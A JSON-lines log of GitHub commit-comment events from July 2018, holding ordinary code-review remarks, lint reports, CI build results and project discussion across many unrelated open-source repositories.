{"id":"7933748069","type":"CommitCommentEvent","actor":{"login":"IzzySoft"},"repo":{"name":"JohnMH/BoogDroid"},"payload":{"comment":{"id":29633039,"position":null,"line":null,"path":null,"commit_id":"84193b1f4346f4f8e0ddaa42d712ab1622255d79","created_at":"2018-07-08T10:47:58Z","updated_at":"2018-07-08T10:47:58Z","author_association":"NONE","body":"If there's enough for a new version, tagging e.g. v0.0.4 *after* having set it accordingly in `build.gradle` of course would be sufficient. Whichever approach is taken, the important thing is both must be in sync, @albfan :wink:"}},"created_at":"2018-07-08T10:47:58Z"}
{"id":"7933748154","type":"CommitCommentEvent","actor":{"login":"haskell-jp-bot"},"repo":{"name":"haskell-jp/blog"},"payload":{"comment":{"id":29633040,"position":null,"line":null,"path":null,"commit_id":"77a44cce663abc413f1c2df6c69b55be168a66d7","created_at":"2018-07-08T10:48:04Z","updated_at":"2018-07-08T10:48:04Z","author_association":"NONE","body":"https://circleci.com/gh/haskell-jp/blog/487/artifacts/0/root/project/generated-site/index.html"}},"created_at":"2018-07-08T10:48:04Z"}
{"id":"7933749284","type":"CommitCommentEvent","actor":{"login":"kamotswind"},"repo":{"name":"OtherCrashOverride/go-play"},"payload":{"comment":{"id":29633043,"position":null,"line":null,"path":null,"commit_id":"0e225b2a7a16fd59f55673e892cdbccd9522ee6e","created_at":"2018-07-08T10:49:03Z","updated_at":"2018-07-08T10:49:03Z","author_association":"NONE","body":"Ah, ya I knew it was something like that. :)"}},"created_at":"2018-07-08T10:49:03Z"}
{"id":"7933751032","type":"CommitCommentEvent","actor":{"login":"vadosnaprimer"},"repo":{"name":"libretro/mame"},"payload":{"comment":{"id":29633045,"position":70,"line":905,"path":"scripts/toolchain.lua","commit_id":"bfba9227b2d98ffb87dbd96cf148d85c1ced15a9","created_at":"2018-07-08T10:50:31Z","updated_at":"2018-07-08T10:50:31Z","author_association":"NONE","body":"This looks like unresolved merge conflict?"}},"created_at":"2018-07-08T10:50:31Z"}
{"id":"7933751394","type":"CommitCommentEvent","actor":{"login":"GaryJones"},"repo":{"name":"blazersix/satispress"},"payload":{"comment":{"id":29633047,"position":22,"line":202,"path":"src/Screen/Settings.php","commit_id":"ae3186392c4922df78224818ef426eb87ea9abf3","created_at":"2018-07-08T10:50:51Z","updated_at":"2018-07-08T10:50:51Z","author_association":"COLLABORATOR","body":"This link should be `target=\"_blank\" rel=\"noopener noreferer\"`."}},"created_at":"2018-07-08T10:50:51Z"}
{"id":"7933751537","type":"CommitCommentEvent","actor":{"login":"GaryJones"},"repo":{"name":"blazersix/satispress"},"payload":{"comment":{"id":29633049,"position":28,"line":87,"path":"views/packages.php","commit_id":"ae3186392c4922df78224818ef426eb87ea9abf3","created_at":"2018-07-08T10:51:00Z","updated_at":"2018-07-08T10:51:00Z","author_association":"COLLABORATOR","body":"This link should be `target=\"_blank\" rel=\"noopener noreferer\"`."}},"created_at":"2018-07-08T10:51:00Z"}
{"id":"7933754016","type":"CommitCommentEvent","actor":{"login":"ElliotVilhelm"},"repo":{"name":"ElliotVilhelm/IZII"},"payload":{"comment":{"id":29633058,"position":null,"line":null,"path":null,"commit_id":"96b19c00fbf61c9ac70267d2a99639bae81a6499","created_at":"2018-07-08T10:53:16Z","updated_at":"2018-07-08T10:53:16Z","author_association":"OWNER","body":"big refactor, major changes in gen_moves.py and hash added to evaluation."}},"created_at":"2018-07-08T10:53:16Z"}
{"id":"7933754801","type":"CommitCommentEvent","actor":{"login":"gitmate-bot"},"repo":{"name":"coala/coala"},"payload":{"comment":{"id":29633059,"position":null,"line":null,"path":null,"commit_id":"1d975ce359c32ee1f08358ae6de3122ed8be6f57","created_at":"2018-07-08T10:54:00Z","updated_at":"2018-07-08T10:54:00Z","author_association":"COLLABORATOR","body":"Comment on 1d975ce359c32ee1f08358ae6de3122ed8be6f57.\n\nThere are 11 results for the section autopep8. They have been shortened and will not be shown inline because they are more than 10.\n\n| Message | File | Line |\n|---|---|---|\n| The code does not comply to PEP8. | coalib/parsing/CliParsing.py | 8 |\n| The code does not comply to PEP8. | coalib/parsing/CliParsing.py | 15 |\n| E302 expected 2 blank lines, found 1 | coalib/parsing/CliParsing.py | 9 |\n| E501 line too long (85 > 80 characters) | coalib/parsing/CliParsing.py | 14 |\n| E302 expected 2 blank lines, found 0 | coalib/parsing/CliParsing.py | 16 |\n| The code does not comply to PEP8. | coalib/parsing/ConfParser.py | 10 |\n| The code does not comply to PEP8. | coalib/parsing/ConfParser.py | 18 |\n| E302 expected 2 blank lines, found 1 | coalib/parsing/ConfParser.py | 11 |\n| E501 line too long (85 > 80 characters) | coalib/parsing/ConfParser.py | 16 |\n| W293 blank line contains whitespace | coalib/parsing/ConfParser.py | 18 |\n| E302 expected 2 blank lines, found 1 | coalib/parsing/ConfParser.py | 19 |\n\nUntil GitMate provides an online UI to show a better overview, you can run [coala](https://coala.io/) locally for more details."}},"created_at":"2018-07-08T10:54:00Z"}
{"id":"7933754899","type":"CommitCommentEvent","actor":{"login":"kevinresol"},"repo":{"name":"MVCoconut/coconut.ww"},"payload":{"comment":{"id":29633060,"position":null,"line":null,"path":null,"commit_id":"a7015003a9b990188ad87033367c8a8aadba6fe3","created_at":"2018-07-08T10:54:06Z","updated_at":"2018-07-08T10:54:06Z","author_association":"NONE","body":"looks proper to me"}},"created_at":"2018-07-08T10:54:06Z"}
{"id":"7933755183","type":"CommitCommentEvent","actor":{"login":"dev-harsh1998"},"repo":{"name":"dev-harsh1998/android_device_lenovo_a6000"},"payload":{"comment":{"id":29633061,"position":null,"line":null,"path":null,"commit_id":"9798a20c870d0b64ea47c03e8bd966986705fd3b","created_at":"2018-07-08T10:54:20Z","updated_at":"2018-07-08T10:54:20Z","author_association":"OWNER","body":"manual sim provisioning was supported on stock! imnr, yes this works"}},"created_at":"2018-07-08T10:54:20Z"}
{"id":"7933761007","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"adobe-type-tools/psautohint"},"payload":{"comment":{"id":29633066,"position":null,"line":null,"path":null,"commit_id":"537cb5775feecf235320ef1f3de0dd39d4381dcd","created_at":"2018-07-08T10:59:36Z","updated_at":"2018-07-08T10:59:36Z","author_association":"MEMBER","body":"I understand why you would want to do that, however consider that these are default options that are passed to pytest all the time, not just when you run pytest through tox, but even when, say, you run `pytest` yourself on a single unit test module. There is no way from the pytest command line to override that default option, if one does not want to exit at the first failure for a specific test run. For unit tests that by definition are independent from each other, one failure does not necessarily correlate to another.\r\nI'd suggest you only pass that option by default when running pytest via tox, using tox's `{posargs:--exitfirst}`, which means the option is passed by default when tox calls pytest, but if the user passes additional positional arguments to tox (anything after `--` separator is assigned to `{posargs}`), e.g. `tox -- -k \"something\" -q --lf`, then the user's options override the default posargs.\r\nhttp://tox.readthedocs.io/en/latest/example/general.html#interactively-passing-positional-arguments"}},"created_at":"2018-07-08T10:59:36Z"}
{"id":"7933763874","type":"CommitCommentEvent","actor":{"login":"vadosnaprimer"},"repo":{"name":"libretro/mame"},"payload":{"comment":{"id":29633075,"position":77,"line":77,"path":"src/osd/modules/render/drawretro.cpp","commit_id":"bfba9227b2d98ffb87dbd96cf148d85c1ced15a9","created_at":"2018-07-08T11:01:35Z","updated_at":"2018-07-08T11:01:35Z","author_association":"NONE","body":"The gcc build dies here, because upstream mame ignores NOWERROR:\r\nhttps://travis-ci.org/libretro/mame/jobs/401382808#L2710\r\n\r\nDunno what's wrong with clang, maybe some leftover in genie scripts?\r\nhttps://travis-ci.org/libretro/mame/jobs/401382809#L2859"}},"created_at":"2018-07-08T11:01:35Z"}
{"id":"7933763979","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"adobe-type-tools/psautohint"},"payload":{"comment":{"id":29633076,"position":6,"line":45,"path":"tests/test_hintfonts.py","commit_id":"93103c08ca2c24664fb6ff20e19f827dee7c1f55","created_at":"2018-07-08T11:01:40Z","updated_at":"2018-07-08T11:01:40Z","author_association":"MEMBER","body":"we should add a context manager that autocloses the file when exiting a `with XMLWriter(path) as w: ... ` block, in upstream fonttools"}},"created_at":"2018-07-08T11:01:40Z"}
{"id":"7933767510","type":"CommitCommentEvent","actor":{"login":"NickKaramoff"},"repo":{"name":"project-six/it-museum"},"payload":{"comment":{"id":29633082,"position":null,"line":null,"path":null,"commit_id":"13735b2087bfc7546399c22197adabbd409edff5","created_at":"2018-07-08T11:04:44Z","updated_at":"2018-07-08T11:04:44Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Инициализировать приложение Django](https://trello.com/c/sWBqdaJ1/13-%D0%B8%D0%BD%D0%B8%D1%86%D0%B8%D0%B0%D0%BB%D0%B8%D0%B7%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D1%82%D1%8C-%D0%BF%D1%80%D0%B8%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5-django)"}},"created_at":"2018-07-08T11:04:44Z"}
{"id":"7933769363","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/src"},"payload":{"comment":{"id":29633096,"position":77,"line":77,"path":"sbin/ifconfig/ifstf.c","commit_id":"2bab086d417ecc50518067358b72f8c48a19b26b","created_at":"2018-07-08T11:06:19Z","updated_at":"2018-07-08T11:06:19Z","author_association":"MEMBER","body":"@RyuunoAelia it might just be a print issue 0 vs. 32 :)"}},"created_at":"2018-07-08T11:06:19Z"}
{"id":"7933770490","type":"CommitCommentEvent","actor":{"login":"huihuifan"},"repo":{"name":"pytorch/fairseq"},"payload":{"comment":{"id":29633098,"position":null,"line":null,"path":null,"commit_id":"30ef667d40b9b34ca9caa43706a89b57531f19a7","created_at":"2018-07-08T11:07:24Z","updated_at":"2018-07-08T11:07:24Z","author_association":"CONTRIBUTOR","body":"added in latest commit. "}},"created_at":"2018-07-08T11:07:24Z"}
{"id":"7933771638","type":"CommitCommentEvent","actor":{"login":"AlexPeshkoff"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":29633102,"position":7,"line":84,"path":"src/common/classes/alloc.h","commit_id":"69523f1886e967cd1491bc4da9939528b404d288","created_at":"2018-07-08T11:08:27Z","updated_at":"2018-07-08T11:08:27Z","author_association":"MEMBER","body":"Not only this place, there is also \r\n#if ALLOC_ALIGNMENT == 8\r\nin a code."}},"created_at":"2018-07-08T11:08:27Z"}
{"id":"7933774129","type":"CommitCommentEvent","actor":{"login":"dyusuf"},"repo":{"name":"bornabesic/cytokine-graph-db"},"payload":{"comment":{"id":29633106,"position":64,"line":64,"path":"string_db.html","commit_id":"29c6136c7d81e91a4e52e6e4998eaac2bf8c9c08","created_at":"2018-07-08T11:10:39Z","updated_at":"2018-07-08T11:10:39Z","author_association":"COLLABORATOR","body":"the confidence score of association is one property needed for edge in the graph database"}},"created_at":"2018-07-08T11:10:39Z"}
{"id":"7933775035","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"adobe-type-tools/psautohint"},"payload":{"comment":{"id":29633108,"position":null,"line":null,"path":null,"commit_id":"535fa1ede3762c7c8bbcadff4358e736f6d29ad5","created_at":"2018-07-08T11:11:26Z","updated_at":"2018-07-08T11:11:26Z","author_association":"MEMBER","body":"python 3 has exception chaining so originating exceptions are not obscured\r\nhttps://www.python.org/dev/peps/pep-3134/\r\n\r\nfor clients of libraries sometimes it's convenient sometimes to only handle exceptions (or subclasses of a base exception) coming off that library, instead of any exceptions coming from the latter's dependencies (which can be seen as an implementation detail if you like).\r\n\r\nthe python-future module has an implementation of `raise from` that works on python2 as well.\r\nhttps://github.com/PythonCharmers/python-future/blob/39a066ed8c29a0b3a32adac2ffd407119fe9ea6d/src/future/utils/__init__.py#L422\r\n\r\nmaybe we could try adding something similar to fontTools.py23."}},"created_at":"2018-07-08T11:11:26Z"}
{"id":"7933778133","type":"CommitCommentEvent","actor":{"login":"Hains"},"repo":{"name":"PLi-metas/meta-dream"},"payload":{"comment":{"id":29633116,"position":null,"line":null,"path":null,"commit_id":"02d2ad5b86e1f687b867e6bb581ca2b4be679159","created_at":"2018-07-08T11:14:10Z","updated_at":"2018-07-08T11:14:10Z","author_association":"MEMBER","body":"No. since Sumo doesn't have that patch.\r\nProblem is now, Sumo(former Rocko) is not maintained for a few months.\r\nSo it's missing a lot of commits.\r\n\r\nI make a preparation for sumo so it does build at least.\r\nBest way i think, is that when OpenPLi have merged Sumo branch into Develop branch,\r\nto cherry-pick the Sumo commits from this branch to develop. "}},"created_at":"2018-07-08T11:14:10Z"}
{"id":"7933783114","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/src"},"payload":{"comment":{"id":29633127,"position":895,"line":1078,"path":"sys/net/if_stf.c","commit_id":"2bab086d417ecc50518067358b72f8c48a19b26b","created_at":"2018-07-08T11:18:35Z","updated_at":"2018-07-08T11:18:35Z","author_association":"MEMBER","body":"Ah you found this first, second culprit for 0 vs. 32."}},"created_at":"2018-07-08T11:18:35Z"}
{"id":"7933784791","type":"CommitCommentEvent","actor":{"login":"AlexPeshkoff"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":29633130,"position":190,"line":856,"path":"src/common/classes/alloc.cpp","commit_id":"69523f1886e967cd1491bc4da9939528b404d288","created_at":"2018-07-08T11:20:02Z","updated_at":"2018-07-08T11:20:02Z","author_association":"MEMBER","body":"That's rather old issue. I need 2 constants - SLOTS and BLOCK_LIMIT, that are related. I can define first (number of slots) as a const expression but an attempt to\r\nconst unsigned TINY_BLOCK_LIMIT = lowLimits[TINY_SLOTS - 1];\r\ncauses a compiler error (at least caused it a few years ago)."}},"created_at":"2018-07-08T11:20:02Z"}
{"id":"7933785434","type":"CommitCommentEvent","actor":{"login":"oehme"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29633133,"position":null,"line":null,"path":null,"commit_id":"1a753e5fc5c17a3f7ee9c1bb37ae77e7ce4d0a6a","created_at":"2018-07-08T11:20:31Z","updated_at":"2018-07-08T11:20:31Z","author_association":"MEMBER","body":"I'd rather have one way of type casting only and sugar it for Kotlin:\r\n\r\n```\r\ntasks.withType<Jar>().named(\"sourceJar\") {}\r\n```\r\n\r\nBut if we do want to introduce a shorter API for casting, why not make it really concise:\r\n\r\n```\r\ntasks.named<Jar>(\"sourceJar\") {}\r\n```\r\n?"}},"created_at":"2018-07-08T11:20:31Z"}
{"id":"7933787117","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"adobe-type-tools/psautohint"},"payload":{"comment":{"id":29633136,"position":19,"line":711,"path":"python/psautohint/__main__.py","commit_id":"cbd611582f48f0e4634f9fba66760c44df40c4fd","created_at":"2018-07-08T11:21:59Z","updated_at":"2018-07-08T11:21:59Z","author_association":"MEMBER","body":"inside `main` usually exceptions' tracebacks are suppressed because users of a script are not concerned with a library's internals. Seeing an unhandled exception with the full trackback printed from a command line script ideally should be \"the exception\", rather than the rule.\r\nMaybe we could put that behind some debug environment variable or commandline option."}},"created_at":"2018-07-08T11:21:59Z"}
{"id":"7933796768","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/src"},"payload":{"comment":{"id":29633154,"position":891,"line":1074,"path":"sys/net/if_stf.c","commit_id":"2bab086d417ecc50518067358b72f8c48a19b26b","created_at":"2018-07-08T11:30:26Z","updated_at":"2018-07-08T11:30:26Z","author_association":"MEMBER","body":"@RyuunoAelia this is interesting as well, later args.prefix is switched from 0 -> 32 but here it is uses as is... nothing to fix, just odd."}},"created_at":"2018-07-08T11:30:26Z"}
{"id":"7933800991","type":"CommitCommentEvent","actor":{"login":"ypid"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29633171,"position":null,"line":null,"path":null,"commit_id":"00f9b21cb78d9f76a8f94e8e62cbcefad65b7d99","created_at":"2018-07-08T11:34:00Z","updated_at":"2018-07-08T11:34:00Z","author_association":"CONTRIBUTOR","body":"Thanks, looks good :+1: Only a small thing: https://github.com/opnsense/core/pull/2525"}},"created_at":"2018-07-08T11:34:00Z"}
{"id":"7933801512","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29633173,"position":82,"line":69,"path":"contracts/RockPaperScissors.sol","commit_id":"f6d452abe1551e7d041cac5332dfd155d3c28e68","created_at":"2018-07-08T11:34:26Z","updated_at":"2018-07-08T11:34:26Z","author_association":"OWNER","body":"Well, I guess that also doesn't work either: If I submit four games, the above approach won't work\r\n"}},"created_at":"2018-07-08T11:34:26Z"}
{"id":"7933801695","type":"CommitCommentEvent","actor":{"login":"meghanasatish"},"repo":{"name":"jawadtahir/Allianz"},"payload":{"comment":{"id":29633175,"position":null,"line":null,"path":null,"commit_id":"db7219df3805d2ae6fab284ca78d35b7e02d1002","created_at":"2018-07-08T11:34:34Z","updated_at":"2018-07-08T11:34:34Z","author_association":"COLLABORATOR","body":"The Owing bills is displaying the first section with bills with status = \"Pending\"\r\n-see OEBillcontroller and Oebills.pug\r\n\r\n#TODO Connect authorize button to api\r\npopulate the 2 section with the pay button\r\nconnect the pay button to api"}},"created_at":"2018-07-08T11:34:34Z"}
{"id":"7933805488","type":"CommitCommentEvent","actor":{"login":"lakhdym"},"repo":{"name":"krharesh/Text-To-Speech-Android"},"payload":{"comment":{"id":29633180,"position":null,"line":null,"path":null,"commit_id":"14f50b1a943534e5cf6b1e44f7b5cc01dc2ad8af","created_at":"2018-07-08T11:37:48Z","updated_at":"2018-07-08T11:37:48Z","author_association":"NONE","body":"Thank you for this great code. i have a problem i would like to read a chain that in a **webView** with (**text to speech**) with **javascript** . \r\n\r\nThanks."}},"created_at":"2018-07-08T11:37:48Z"}
{"id":"7933805579","type":"CommitCommentEvent","actor":{"login":"dadoonet"},"repo":{"name":"xeraa/vagrant-elastic-stack"},"payload":{"comment":{"id":29633181,"position":null,"line":null,"path":null,"commit_id":"c4a202c47fbe14e00958a1d57b4d189209f4f85a","created_at":"2018-07-08T11:37:52Z","updated_at":"2018-07-08T11:37:52Z","author_association":"CONTRIBUTOR","body":"Great.\r\nInteresting that such an option actually exists. I did open https://github.com/elastic/beats/issues/7514 but no one told me that yet. And I spoke on slack with the beats team before opening the issue. "}},"created_at":"2018-07-08T11:37:52Z"}
{"id":"7933808592","type":"CommitCommentEvent","actor":{"login":"eduardonunesp"},"repo":{"name":"loomnetwork/truffle-dappchain-example"},"payload":{"comment":{"id":29633184,"position":null,"line":null,"path":null,"commit_id":"a1452cec0c559b3f44750723153eba7b4d297f48","created_at":"2018-07-08T11:40:27Z","updated_at":"2018-07-08T11:40:27Z","author_association":"COLLABORATOR","body":"Thanks, @lukezhangstudio, the last update of the `loom-js` break some compatibility with old builds, I forgot to update this here :("}},"created_at":"2018-07-08T11:40:27Z"}
{"id":"7933809017","type":"CommitCommentEvent","actor":{"login":"george521"},"repo":{"name":"george521/StupidQuiz"},"payload":{"comment":{"id":29633185,"position":null,"line":null,"path":null,"commit_id":"6a87ceff5cfdb208bdcbd51cb91d56631bc1da07","created_at":"2018-07-08T11:40:49Z","updated_at":"2018-07-08T11:40:49Z","author_association":"OWNER","body":"Now it creates the LeaderBoard.txt file that is needed for the game and correction to an answer."}},"created_at":"2018-07-08T11:40:49Z"}
{"id":"7933809623","type":"CommitCommentEvent","actor":{"login":"spinzaku"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29633188,"position":null,"line":null,"path":null,"commit_id":"e13ca63cc8accb5ad4c8d711c6dfd5b954f4967e","created_at":"2018-07-08T11:41:15Z","updated_at":"2018-07-08T11:41:15Z","author_association":"NONE","body":"This seems to work fine if the skill is level 5 and you get 500 item slots. But when i tested a new guild with only level 2 guild storage expansion, only 100 item slots?"}},"created_at":"2018-07-08T11:41:15Z"}
{"id":"7933813294","type":"CommitCommentEvent","actor":{"login":"tambry"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29633196,"position":null,"line":null,"path":null,"commit_id":"7d107897e0cafdfcb4ee38926992c75d8e471e9e","created_at":"2018-07-08T11:44:23Z","updated_at":"2018-07-08T11:44:23Z","author_association":"MEMBER","body":"@the-j0k3r The stripping is because it's your commit that's verified. When somebody merges your commit, it's really them committing it to the upstream branch. Them committing a verified commit from another person doesn't make their own commit inherently verified."}},"created_at":"2018-07-08T11:44:23Z"}
{"id":"7933820793","type":"CommitCommentEvent","actor":{"login":"fomalsd"},"repo":{"name":"unitystation/unitystation"},"payload":{"comment":{"id":29633207,"position":null,"line":null,"path":null,"commit_id":"3b165836242d350a1e589137fa08011ae99baaf1","created_at":"2018-07-08T11:50:35Z","updated_at":"2018-07-08T11:50:35Z","author_association":"CONTRIBUTOR","body":"oh, if you're keeping Newtonsoft then we should ditch fsSerializer stuff we already have"}},"created_at":"2018-07-08T11:50:35Z"}
{"id":"7933820823","type":"CommitCommentEvent","actor":{"login":"NoExits"},"repo":{"name":"NoExits/Inventory-App"},"payload":{"comment":{"id":29633208,"position":null,"line":null,"path":null,"commit_id":"97794825dcf025af3a5b853aeafd1b7affb6607b","created_at":"2018-07-08T11:50:36Z","updated_at":"2018-07-08T11:50:36Z","author_association":"OWNER","body":"This commit also includes partly implementing the ListActivity because of a typo. Since this is a personal project I'll not invest time in fixing this commit to make it separated."}},"created_at":"2018-07-08T11:50:36Z"}
{"id":"7933822267","type":"CommitCommentEvent","actor":{"login":"dyusuf"},"repo":{"name":"bornabesic/cytokine-graph-db"},"payload":{"comment":{"id":29633210,"position":94,"line":174,"path":"string_db.html","commit_id":"0d389c4b07a85de59436db364ae149306ca72687","created_at":"2018-07-08T11:51:46Z","updated_at":"2018-07-08T11:51:46Z","author_association":"COLLABORATOR","body":"try to find out the metric? this may be useful for the clustering with machine learning later on"}},"created_at":"2018-07-08T11:51:46Z"}
{"id":"7933822965","type":"CommitCommentEvent","actor":{"login":"persianpros"},"repo":{"name":"PLi-metas/meta-dream"},"payload":{"comment":{"id":29633214,"position":null,"line":null,"path":null,"commit_id":"02d2ad5b86e1f687b867e6bb581ca2b4be679159","created_at":"2018-07-08T11:52:20Z","updated_at":"2018-07-08T11:52:20Z","author_association":"MEMBER","body":"In my opinion the best thing to do is:\r\n\r\n- create a new branch \"sumo-new\" based on \"develop\"\r\n- cherry-pick only what you need from \"sumo\"\r\n- remove \"sumo\"\r\n- rename \"sumo-new\" to \"sumo\"\r\n\r\nIt will be easier."}},"created_at":"2018-07-08T11:52:20Z"}
{"id":"7933828982","type":"CommitCommentEvent","actor":{"login":"wqlevi"},"repo":{"name":"wqlevi/CAFFE_INSTALLATION"},"payload":{"comment":{"id":29633228,"position":6,"line":4,"path":"README.md","commit_id":"d1b12636309af18590bfc8f7c2998baa537e41eb","created_at":"2018-07-08T11:57:29Z","updated_at":"2018-07-08T11:57:29Z","author_association":"OWNER","body":"On digits-devserver: Train a model failed with error: CUDNN_STATUS_NOT_INITIALIZED"}},"created_at":"2018-07-08T11:57:29Z"}
{"id":"7933829958","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29633230,"position":null,"line":null,"path":null,"commit_id":"8a7f7d6f776766877ad6790104bde49a6bc29894","created_at":"2018-07-08T11:58:15Z","updated_at":"2018-07-08T11:58:15Z","author_association":"NONE","body":"develop (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2308 of 2308 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-08T11:58:15Z"}
{"id":"7933831565","type":"CommitCommentEvent","actor":{"login":"oscam-emu"},"repo":{"name":"oscam-emu/oscam-emu"},"payload":{"comment":{"id":29633234,"position":null,"line":null,"path":null,"commit_id":"c90f68685b521ddeb84bce35f84d255840c1e48c","created_at":"2018-07-08T11:59:44Z","updated_at":"2018-07-08T11:59:44Z","author_association":"OWNER","body":"On which line do you get the warning? My compiler doesn't complain about it."}},"created_at":"2018-07-08T11:59:44Z"}
{"id":"7933833215","type":"CommitCommentEvent","actor":{"login":"Valeri0p"},"repo":{"name":"ahezard/nds-bootstrap"},"payload":{"comment":{"id":29633243,"position":null,"line":null,"path":null,"commit_id":"76d57175ae77e6c3a6120623499fd8e73feac6ca","created_at":"2018-07-08T12:00:43Z","updated_at":"2018-07-08T12:00:43Z","author_association":"NONE","body":"#290"}},"created_at":"2018-07-08T12:00:43Z"}
{"id":"7933833582","type":"CommitCommentEvent","actor":{"login":"PhilippeTrounev"},"repo":{"name":"celery/celery"},"payload":{"comment":{"id":29633244,"position":null,"line":null,"path":null,"commit_id":"d4702396e824886a7f58b3f6d6c6ae34e99a6efb","created_at":"2018-07-08T12:00:58Z","updated_at":"2018-07-08T12:00:58Z","author_association":"NONE","body":"Umm this is a wrong repository please ignore. Just copying the issue template off of celery "}},"created_at":"2018-07-08T12:00:58Z"}
{"id":"7933833693","type":"CommitCommentEvent","actor":{"login":"glennsarti"},"repo":{"name":"beergeek/os_updates"},"payload":{"comment":{"id":29633245,"position":13,"line":9,"path":"tasks/win_checkupdates_wsus.rb","commit_id":"8f73123505ba986008f534c364212330695aa644","created_at":"2018-07-08T12:01:04Z","updated_at":"2018-07-08T12:01:04Z","author_association":"NONE","body":"While single quotes will parse back slashes ... we normally escape  ('\\\\') or use forward slash\r\n\r\nNote - C:\\ is not guaranteed to the be system drive.  Should use the SYSTEMDRIVE env var\r\nNote - C:\\Windows is not guaranteed to exist.  Should use the WINDIR env var\r\n\r\nNote - System32 is ok-ish.  We don't support 32bit puppet on 64bit OS\r\n"}},"created_at":"2018-07-08T12:01:04Z"}
{"id":"7933834219","type":"CommitCommentEvent","actor":{"login":"glennsarti"},"repo":{"name":"beergeek/os_updates"},"payload":{"comment":{"id":29633246,"position":18,"line":14,"path":"tasks/win_checkupdates_wsus.rb","commit_id":"8f73123505ba986008f534c364212330695aa644","created_at":"2018-07-08T12:01:25Z","updated_at":"2018-07-08T12:01:25Z","author_association":"NONE","body":"This is Local System Temp dir.  Should really use TEMP env var."}},"created_at":"2018-07-08T12:01:25Z"}
{"id":"7933835238","type":"CommitCommentEvent","actor":{"login":"glennsarti"},"repo":{"name":"beergeek/os_updates"},"payload":{"comment":{"id":29633247,"position":25,"line":21,"path":"tasks/win_checkupdates_wsus.rb","commit_id":"8f73123505ba986008f534c364212330695aa644","created_at":"2018-07-08T12:02:14Z","updated_at":"2018-07-08T12:02:14Z","author_association":"NONE","body":"Any reason you can't use ruby for the download instead of shelling to powershell?"}},"created_at":"2018-07-08T12:02:14Z"}
{"id":"7933835383","type":"CommitCommentEvent","actor":{"login":"MNKCrypto"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29633248,"position":57,"line":57,"path":"contracts/Remittance.sol","commit_id":"003f778f66e45b8fcf6664299362ea35cf6967fd","created_at":"2018-07-08T12:02:19Z","updated_at":"2018-07-08T12:02:19Z","author_association":"OWNER","body":"Hi Rob. So if I understand your comment correctly, the hashing that you do to derive the key value of mapping can be done off chain and this actually takes off the load from the computation happening on chain. Correct me If I am wrong."}},"created_at":"2018-07-08T12:02:19Z"}
{"id":"7933835726","type":"CommitCommentEvent","actor":{"login":"gnuemhuemten"},"repo":{"name":"gnuemhuemten/PlayAround"},"payload":{"comment":{"id":29633249,"position":36,"line":36,"path":"README.md","commit_id":"2539352ea2461aefa235a7a21d7ce6c693d51b89","created_at":"2018-07-08T12:02:38Z","updated_at":"2018-07-08T12:02:38Z","author_association":"OWNER","body":"TODO - here create a usage guide."}},"created_at":"2018-07-08T12:02:38Z"}
{"id":"7933835938","type":"CommitCommentEvent","actor":{"login":"dyusuf"},"repo":{"name":"bornabesic/cytokine-graph-db"},"payload":{"comment":{"id":29633250,"position":20,"line":200,"path":"string_db.html","commit_id":"8aab2b14c071e507275dfff21fcf88c7f78d4daa","created_at":"2018-07-08T12:02:50Z","updated_at":"2018-07-08T12:02:50Z","author_association":"COLLABORATOR","body":"yes, it would be great to have direction info but it seems to be difficult to find it from the string database. for the moment, the predicted action (binding, activation etc.) should be good enough to start. "}},"created_at":"2018-07-08T12:02:50Z"}
{"id":"7933836067","type":"CommitCommentEvent","actor":{"login":"glennsarti"},"repo":{"name":"beergeek/os_updates"},"payload":{"comment":{"id":29633251,"position":36,"line":32,"path":"tasks/win_checkupdates_wsus.rb","commit_id":"8f73123505ba986008f534c364212330695aa644","created_at":"2018-07-08T12:02:57Z","updated_at":"2018-07-08T12:02:57Z","author_association":"NONE","body":"See above C:\\Temp.  There may be an issue with TLS 1.2 e.g. from github.  Older .net frameworks don't add that by default."}},"created_at":"2018-07-08T12:02:57Z"}
{"id":"7933836483","type":"CommitCommentEvent","actor":{"login":"winapp81"},"repo":{"name":"winapp81/1"},"payload":{"comment":{"id":29633252,"position":4,"line":4,"path":"Program.cs","commit_id":"5fecff3adb2df88d27c968fe3282480ca0f4f9fe","created_at":"2018-07-08T12:03:19Z","updated_at":"2018-07-08T12:03:19Z","author_association":"OWNER","body":"코멘트"}},"created_at":"2018-07-08T12:03:19Z"}
